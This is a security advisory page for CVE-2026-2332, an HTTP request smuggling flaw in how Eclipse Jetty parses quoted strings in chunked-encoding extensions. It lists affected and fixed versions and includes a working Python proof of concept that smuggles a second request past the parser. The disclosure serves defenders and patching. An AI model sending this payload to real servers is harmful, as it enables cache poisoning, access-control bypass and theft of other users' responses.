CVE-2026-2332: HTTP Request Smuggling via Chunked Extension Quoted-String Parsing

Published Apr 14, 2026
·
Updated

### Description (as reported) Jetty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. ### Background This vulnerability is a new variant discovered while researching the "Funky Chunks" HTTP request smuggling techniques: - https://w4ke.info/2025/06/18/funky-chunks.html - https://w4ke.info/2025/10/29/funky-chunks-2.html The original research tested various chunk extension parsing differentials but did not test quoted-string handling within extension values. ### Technical Details **RFC 9112 Section 7.1.1** defines chunked transfer encoding: ``` chunk = chunk-size [ chunk-ext ] CRLF chunk-data CRLF chunk-ext = *( BWS ";" BWS chunk-ext-name [ BWS "=" BWS chunk-ext-val ] ) chunk-ext-val = token / quoted-string ``` **RFC 9110 Section 5.6.4** defines quoted-string: ``` quoted-string = DQUOTE *( qdtext / quoted-pair ) DQUOTE ``` A quoted-string continues until the closing DQUOTE, and `\r\n` sequences are not permitted within the quotes. ### Vulnerability Jetty terminates chunk header parsing at `\r\n` inside quoted strings instead of treating this as an error. **Expected (RFC compliant):** ``` Chunk: 1;a="value\r\nhere"\r\n ^^^^^^^^^^^^^^^^^^ extension value Body: [1 byte after the real \r\n] ``` **Actual (jetty):** ``` Chunk: 1;a="value ^^^^^ terminates here (WRONG) Body: here"... treated as body/next request ``` ### Proof of Concept ```python #!/usr/bin/env python3 import socket payload = ( b"POST / HTTP/1.1\r\n" b"Host: localhost\r\n" b"Transfer-Encoding: chunked\r\n" b"\r\n" b'1;a="\r\n' b"X\r\n" b"0\r\n" b"\r\n" b"GET /smuggled HTTP/1.1\r\n" b"Host: localhost\r\n" b"Content-Length: 11\r\n" b"\r\n" b'"\r\n' b"Y\r\n" b"0\r\n" b"\r\n" ) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3) sock.connect(("127.0.0.1", 8080)) sock.sendall(payload) response = b"" while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk except socket.timeout: break sock.close() print(f"Responses: {response.count(b'HTTP/')}") print(response.decode(errors="replace")) ``` **Result:** Server returns 2 HTTP responses from a single TCP connection. #### Parsing Breakdown | Parser | Request 1 | Request 2 | |--------|-----------|-----------| | jetty (vulnerable) | POST / body="X" | GET /smuggled (SMUGGLED!) | | RFC compliant | POST / body="Y" | (none - smuggled request hidden in extension) | ### Impact - **Request Smuggling**: Attacker injects arbitrary HTTP requests - **Cache Poisoning**: Smuggled responses poison shared caches - **Access Control Bypass**: Smuggled requests bypass frontend security - **Session Hijacking**: Smuggled requests can steal other users' responses ### Reproduction 1. Start the minimal POC with docker 2. Run the poc script provided in same zip ### Suggested Fix Ensure the chunk framing and extensions are parsed exactly as specified in RFC9112. A CRLF inside a quoted-string should be considered a parsing error and not a line terminator. ### Patches No patches yet. ### Workarounds No workarounds yet.

Affected Software

11 affected componentsFixes available
Eclipse Jetty
maven/org.eclipse.jetty:jetty-http>=9.4.0<=9.4.59
9.4.60
maven/org.eclipse.jetty:jetty-http>=10.0.0<=10.0.27
10.0.28
maven/org.eclipse.jetty:jetty-http>=11.0.0<=11.0.27
11.0.28
maven/org.eclipse.jetty:jetty-http>=12.0.0<=12.0.32
12.0.33
maven/org.eclipse.jetty:jetty-http>=12.1.0<=12.1.6
12.1.7
Eclipse Jetty>=9.4.0<9.4.60
Eclipse Jetty>=10.0.0<10.0.28
Eclipse Jetty>=11.0.0<11.0.28
Eclipse Jetty>=12.0.0<12.0.33
Eclipse Jetty>=12.1.0<12.1.7

Event History

Apr 14, 2026
CVE Published
via MITRE·10:59 AM
Data Sourced
via MITRE·10:59 AM
DescriptionSeverityWeakness
Data Sourced
via Red Hat·12:01 PM
DescriptionSeverityAffected Software
Data Sourced
via NVD·12:16 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·12:16 PM
Affected Software
Advisory Published
via GitHub·11:40 PM
Data Sourced
via GitHub·11:40 PM
DescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-2332?

CVE-2026-2332 is classified as a high severity vulnerability due to its potential for HTTP request smuggling attacks.

2

How do I fix CVE-2026-2332?

To mitigate CVE-2026-2332, upgrade to the latest version of Eclipse Jetty where the vulnerability has been addressed.

3

What types of systems are affected by CVE-2026-2332?

CVE-2026-2332 specifically affects applications using the Eclipse Jetty server that handle HTTP/1.1 requests.

4

What are the risks associated with CVE-2026-2332?

Exploiting CVE-2026-2332 can allow attackers to smuggle malicious requests, potentially leading to unauthorized access or data manipulation.

5

Is CVE-2026-2332 easily exploitable?

CVE-2026-2332 can be exploited under certain conditions, making it essential for Jetty users to assess their exposure and apply necessary updates.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203